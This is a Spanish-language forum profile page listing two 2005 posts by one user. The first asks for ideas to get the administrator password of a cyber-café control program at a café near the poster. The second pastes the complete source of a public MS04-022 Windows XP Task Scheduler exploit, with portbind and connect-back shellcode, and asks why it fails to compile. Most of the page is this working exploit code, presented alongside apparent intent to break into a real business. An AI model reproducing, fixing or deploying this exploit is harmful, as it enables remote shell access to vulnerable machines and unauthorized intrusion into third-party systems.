Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - edipo

Páginas1
#1
Bugs y Exploits / Re: Exploit para Ciber Control 4.0
8 Julio 2005, 01:55 AM
HOLA A TODOS

ESTE TEMA ME HA INTERESADO MUCHO Y NO CON EL FIN DE MOLESTAR SINO APRENDER  Y ME A SURGIDO UNA PREGUNTA ¿EN MI CUDRA HAY UN CIBER CAFE Y TIENEN OTRO PROGRAMA SE LLAMA CONTROLADOR DE CIBER Y LA pagina DONDE SE ENCUENTRA ES  www.cbm.com.ar
LO HE INTENTADO CON LOS EXPLOITS QUE AQUY APARESEN ADEMAS HE ANALIZADO EL PROGRAMA Y LE HE BUSCADO EL ARCHIVO DONDE SE NECUENTRA EL PASS DE ADMINISTRADOR PERO NADAD ALGUIEN ME PUEDE COLABORAR CON ESTO NO QUIERO QUE ME DIGAN COMO SINO QUE ME DEN UNA IDEA?

A TODOS GRACIAS.........................
#2
Programación C/C++ / Re: Novato en C y Dev-c++
18 Mayo 2005, 19:46 PM
a todos yo tambien e querido compilar en devc++ y me da ciertos errores como en ejemplo

C:\DEV-C_~1\Bin\ld.exe: warning: cannot find entry symbol _WinMainCRTStartup; defaulting to 00401000
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `usage':
//c/dev-c_~1/include/objc/ms0402~1.c:233: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:234: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:235: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:236: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:237: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:238: undefined reference to `exit'
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `main':
//c/dev-c_~1/include/objc/ms0402~1.c:243: undefined reference to `__main'
//c/dev-c_~1/include/objc/ms0402~1.c:249: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:250: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:254: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:257: undefined reference to `fopen'
//c/dev-c_~1/include/objc/ms0402~1.c:259: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:260: undefined reference to `exit'
//c/dev-c_~1/include/objc/ms0402~1.c:264: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:265: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:267: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:268: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:270: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:271: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:272: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:273: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:274: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:279: undefined reference to `inet_addr@4'
//c/dev-c_~1/include/objc/ms0402~1.c:281: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:282: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:283: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:284: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:285: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:290: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:291: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:292: undefined reference to `fclose'

entonces que si el exploit es este
[td][/td]/* HOD-ms04022-task-expl.c:
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* Exploit version 0.1 coded by
*
*
*                 .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* Tested on:
*    - Internet Explorer 6.0 (SP1) (iexplore.exe)
*    - Explorer (explorer.exe)
*    - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
*    Win32/VC++  : cl HOD-ms04022-task-expl.c
*    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
*    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
*   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
*   Shellcode:
*        1 - Portbind shellcode
*        2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
*
  • Shellcode: Portbind, port = 7777
    *
  • Generate file: expl.job
    *
    * C:\>
    *
    * start IE -> C:\
    *
    * C:\>telnet localhost 7777
    * Microsoft Windows XP [,¥àá¨ï 5.1.2600]
    * (') Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
    *
    * C:\Documents and Settings\v.X\ ¡®ç¨© á⮫>
    *
    * -------------------------------------------------------------------
    *
    *   This is provided as proof-of-concept code only for educational
    *   purposes and testing by authorized individuals with permission to
    *   do so.
    *
    */

    /* #define _WIN32 */

    #include <stdio.h>
    #include <stdlib.h>
    #include "winsock.h"
    #ifdef _WIN32
    #pragma comment(lib,"ws2_32")


    #else
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #endif



    unsigned char jobfile[] =

    /* job header */
    "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
    "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
    "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
    "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00"

    /* length */
    "\x11\x11"

    /* garbage C:\... */
    /* unicode */
    "\x43\x00\x3A\x00\x5C\x00\x61\x00"
    "\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"

    "\x1E\x82\xDC\x77"

    /* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
    /* for Win2k use jmp ebx or call ebx  */

    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
    "\x80\x31\x31\x80" /* generate exception */

    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x90\x90";



    /* portbind shellcode */
    unsigned char portbindsc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" /* overwrite SEH-frame */
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"

    "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
    "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
    "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
    "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
    "\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
    "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
    "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
    "\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
    "\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
    "\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
    "\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
    "\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
    "\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
    "\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
    "\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
    "\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
    "\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
    "\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
    "\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
    "\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
    "\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
    "\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
    "\x28\xff\x55\x0c";



    /* connectback shellcode */
    unsigned char connectbacksc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" /* overwrite SEH-frame */
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"

    "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
    "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
    "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
    "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
    "\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
    "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
    "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
    "\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
    "\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
    "\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
    "\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
    "\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
    "\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
    "\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
    "\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
    "\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
    "\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
    "\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
    "\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
    "\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
    "\x77\x38\xff\x55\x20\xff\x55\x0c";



    /* use this form
    unsigned char sc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" - overwrite SEH-frame
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"

    "... code ...";
    */

    unsigned char endofjob[] = "\x00\x00\x00\x00";

    #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
    #define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+283+16)) = (ip)
    #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

    void
    usage(char *prog)
    {
    printf("Usage:\n");
    printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog);
    printf("\nShellcode:\n");
    printf("      1 - Portbind shellcode\n");
    printf("      2 - Connectback shellcode\n\n");
    exit(0);
    }

    int
    main(int argc, char **argv)
    {
    unsigned short strlen;
    unsigned short port;
    unsigned long ip, sc;
    FILE *fp, *fp2;

    printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
    printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

    if (argc < 4) usage(argv[0]);

    sc = atoi(argv[2]);
    if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

    fp = fopen(argv[1], "wb");
    if (fp == NULL) {
    printf("[-] error: can\'t create file: %s\n", argv[1]);
    exit(0);
    }

    /* header & garbage */
    fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
    fseek(fp, 39*16, SEEK_SET);

    port = atoi(argv[3]);
    printf("
  • Shellcode: ");
    if (sc == 1) {
    SET_PORTBIND_PORT(portbindsc, htons(port));
    printf("Portbind, port = %u\n", port);
    fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
    fwrite(endofjob, 1, 4, fp);
    fseek(fp, 70, SEEK_SET);
    /* calculate length (see header) */
    strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
    }
    else {
    ip = inet_addr(argv[4]);
    SET_CONNECTBACK_IP(connectbacksc, ip);
    SET_CONNECTBACK_PORT(connectbacksc, htons(port));
    printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
    fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
    fwrite(endofjob, 1, 4, fp);
    fseek(fp, 70, SEEK_SET);
    /* calculate length (see header) */
    strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
    }

    printf("
  • Generate file: %s\n", argv[1]);
    fwrite(&strlen, 1, 2, fp);
    fclose(fp);

    return 0;
    }
    [td][/td]
    porfavor ayudenme soy algo nuevo y e leido libros que siento que se me ba a estallar el cerebro gracias
Páginas1